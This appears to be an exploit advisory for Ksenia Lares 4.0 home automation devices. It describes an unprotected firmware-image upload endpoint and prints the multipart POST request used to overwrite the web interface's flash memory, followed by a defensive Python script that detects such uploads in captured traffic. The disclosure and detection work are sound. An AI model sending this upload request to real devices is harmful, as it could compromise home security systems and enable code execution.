Ksenia Security Lares 4.0 Home Automation Remote Code Execution

2025.04.01
Credit: ShadeLock
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Ksenia Security Lares 4.0 Home Automation Remote Code Execution
# Google Dork: N/A
# Date: 31 March 2025
# Exploit Author: Mencha 'ShadeLock' Isajlovska
# Vendor Homepage: https://www.kseniasecurity.com/en/
# Software Link: https://www.kseniasecurity.com/en/company/why-lares-4-0.html
# Version: Lares 4.0
# Tested on: Ksenia Lares Webserver
# CVE : N/A
# Desc: The device provides access to an unprotected endpoint, enabling the upload of MPFS File System binary images. Authenticated attackers can exploit this vulnerability to overwrite the flash program memory containing the web server's main interfaces, potentially leading to arbitrary code execution.

POST /upload HTTP/1.1
Host: 192.168.1.2

------WebKitFormBoundary5GYWB4nichZAk7BS
Content-Disposition: form-data; name="i"; filename="MPFSImage.bin"
Content-Type: application/octet-stream

------WebKitFormBoundary5GYWB4nichZAk7BS--
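A defender-side check for the request shown above, as an added example that is not part of the original advisory: it parses a captured HTTP request and flags a multipart image upload to `/upload` in form field `i`, recording whether the request carried a cookie or Authorization header. The function name, the sample captures and the `MPFS` magic-byte check are assumptions made for this illustration.

```python
import re

UPLOAD_PATH = "/upload"  # endpoint from the advisory's request
FIELD_NAME = b"i"        # multipart field name from the advisory's request
MPFS_MAGIC = b"MPFS"     # assumption: leading magic bytes of an MPFS image

PART_RE = re.compile(
    rb'Content-Disposition:\s*form-data;\s*name="([^"]*)"(?:;\s*filename="([^"]*)")?',
    re.IGNORECASE)

def inspect_request(raw):
    """Return a finding dict if raw is an image upload to /upload, else None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if (len(parts) != 3 or parts[0].upper() != "POST"
            or parts[1].split("?", 1)[0].rstrip("/") != UPLOAD_PATH):
        return None
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    for m in PART_RE.finditer(body):
        if m.group(1) != FIELD_NAME or m.group(2) is None:
            continue
        # Payload: blank line after the part headers up to the next boundary.
        start = body.find(b"\r\n\r\n", m.end())
        payload = body[start + 4:] if start >= 0 else b""
        end = payload.find(b"\r\n--")
        payload = payload[:end] if end >= 0 else payload
        return {
            "host": headers.get("host", ""),
            "filename": m.group(2).decode("latin-1"),
            "size": len(payload),
            "mpfs_magic": payload.startswith(MPFS_MAGIC),
            "has_credentials": "cookie" in headers or "authorization" in headers,
        }
    return None

# Constructed sample captures (not real traffic); payload is a placeholder.
B = b"----x"
UPLOAD = (b"POST /upload HTTP/1.1\r\nHost: 192.168.1.2\r\n"
          b"Content-Type: multipart/form-data; boundary=" + B + b"\r\n\r\n--" + B +
          b'\r\nContent-Disposition: form-data; name="i"; filename="MPFSImage.bin"'
          b"\r\nContent-Type: application/octet-stream\r\n\r\n"
          b"MPFS" + b"\x00" * 12 + b"\r\n--" + B + b"--\r\n")
BENIGN = b"GET /index.htm HTTP/1.1\r\nHost: 192.168.1.2\r\n\r\n"

if __name__ == "__main__":
    for sample in (UPLOAD, BENIGN):
        print(inspect_request(sample))
```

A finding with `has_credentials` set to false is the case to triage first, since the advisory describes the endpoint as unprotected.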

